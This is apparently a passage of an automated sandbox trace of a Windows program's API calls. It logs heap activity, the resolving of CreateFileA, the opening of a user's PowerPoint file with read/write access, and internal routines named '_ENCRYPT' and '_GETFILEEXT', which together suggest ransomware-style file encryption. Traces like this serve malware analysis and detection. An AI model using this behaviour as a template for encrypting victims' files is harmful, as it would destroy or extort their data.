(HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0036.279] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0036.279] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0036.279] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0036.279] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0036.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0036.279] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0036.280] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0036.280] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0036.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0036.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0036.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0036.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0036.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0036.280] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0036.280] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0036.280] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0036.280] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0036.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0036.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0036.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0036.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0036.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0036.280] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0036.280] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0036.280] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0036.280] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0036.280] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0036.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0036.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0036.280] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0036.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x889910 [0036.280] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x889910, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0036.280] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0036.281] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0036.281] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0036.281] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0036.281] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0036.281] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0036.281] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0036.281] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0036.281] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0036.281] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889910 [0036.281] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x889910, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0036.281] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0036.281] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0036.281] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0036.281] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0036.281] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0036.281] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0036.281] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0036.281] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0036.281] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0036.281] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0036.281] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0036.281] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0036.281] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0036.281] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0036.281] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0x935008 [0036.281] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\N-yzi.pptx", cchWideChar=69, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 69 [0036.281] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x45) returned 0x88e138 [0036.281] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\N-yzi.pptx", cchWideChar=69, lpMultiByteStr=0x88e138, cbMultiByte=69, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\N-yzi.pptx", lpUsedDefaultChar=0x0) returned 69 [0036.281] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e138 | out: hHeap=0x770000) returned 1 [0036.282] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0036.282] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0036.282] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0036.282] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0036.282] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0036.282] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0036.282] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0036.282] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0036.282] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\N-yzi.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\n-yzi.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0036.282] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0036.282] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0036.282] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0036.282] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0036.282] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0036.282] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0036.282] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0036.282] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0036.282] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0036.282] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0036.282] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0036.282] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0036.282] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0036.282] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0036.282] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x935008, cbMultiByte=69, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0036.282] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8a) returned 0x7c3818 [0036.282] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x935008, cbMultiByte=69, lpWideCharStr=0x7c3818, cchWideChar=69 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\N-yzi.pptx") returned 69 [0036.282] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0036.283] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x90) returned 0x7c38b0 [0036.283] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c3818 | out: hHeap=0x770000) returned 1 [0036.283] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0036.283] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0036.283] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0036.283] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0036.283] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0036.283] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0036.283] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0036.283] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0036.283] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0036.283] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0036.283] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0036.283] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0036.283] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0036.283] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0036.283] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0036.283] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0036.283] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0036.283] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0036.283] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0036.283] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0036.283] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0036.283] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0036.283] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0036.283] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0036.283] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0036.283] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0036.283] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0036.283] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0036.283] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0036.284] FreeLibrary (hLibModule=0x76e10000) returned 1 [0036.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0036.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0036.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0036.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0036.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0036.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0036.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0036.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0036.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0036.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0036.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0036.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0036.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0036.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0036.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0036.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0036.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0036.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0036.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0036.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0036.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0036.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0036.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0036.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0036.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0036.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0036.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0036.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0036.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0036.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0036.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0036.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0036.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0036.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0036.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0036.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0036.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0036.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0036.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0036.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0036.285] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0036.285] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0036.285] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0036.285] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0036.285] FreeLibrary (hLibModule=0x76e10000) returned 1 [0036.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0036.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0036.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0036.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0036.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0036.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0036.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0036.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0036.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0036.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0036.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0036.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0036.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0036.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0036.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0036.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0036.286] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0036.286] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0036.286] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0036.286] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0036.286] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0036.286] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0036.286] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0036.286] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0036.286] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0036.286] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0036.286] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0036.286] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0036.286] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0036.286] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0036.286] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.286] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0036.286] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0036.286] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0036.286] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0036.286] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.286] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.286] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ptx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.286] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pptx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.286] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pptx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0036.286] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0036.286] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0036.286] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0036.286] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0036.286] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0036.287] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0036.287] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0036.287] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0036.287] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0036.287] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0036.287] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.287] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.287] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.287] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\N-yzi.pptx", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83fd62e0, ftCreationTime.dwHighDateTime=0x1d5be50, ftLastAccessTime.dwLowDateTime=0xd5dc2a40, ftLastAccessTime.dwHighDateTime=0x1d5beed, ftLastWriteTime.dwLowDateTime=0xd5dc2a40, ftLastWriteTime.dwHighDateTime=0x1d5beed, nFileSizeHigh=0x0, nFileSizeLow=0xcab3, dwReserved0=0x0, dwReserved1=0x777648, 